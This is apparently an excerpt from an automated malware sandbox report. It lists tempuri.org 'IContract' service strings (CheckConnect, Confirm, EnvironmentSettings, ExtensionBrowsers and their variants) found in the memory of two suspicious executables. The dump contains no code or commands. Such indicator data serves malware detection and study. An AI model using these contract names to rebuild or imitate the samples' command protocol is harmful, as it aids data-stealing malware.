                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnectLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnectResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/CheckConnectResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/Confirm
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ConfirmLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ConfirmResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ConfirmResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettings
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettingsLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettingsResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/EnvironmentSettingsResponseH9
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002C37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/ExtendV
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsers
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, 
Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsersLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, 
Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsersResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmp
                  String found in binary or memory: http://tempuri.org/IContract/ExtensionBrowsersResponseH9
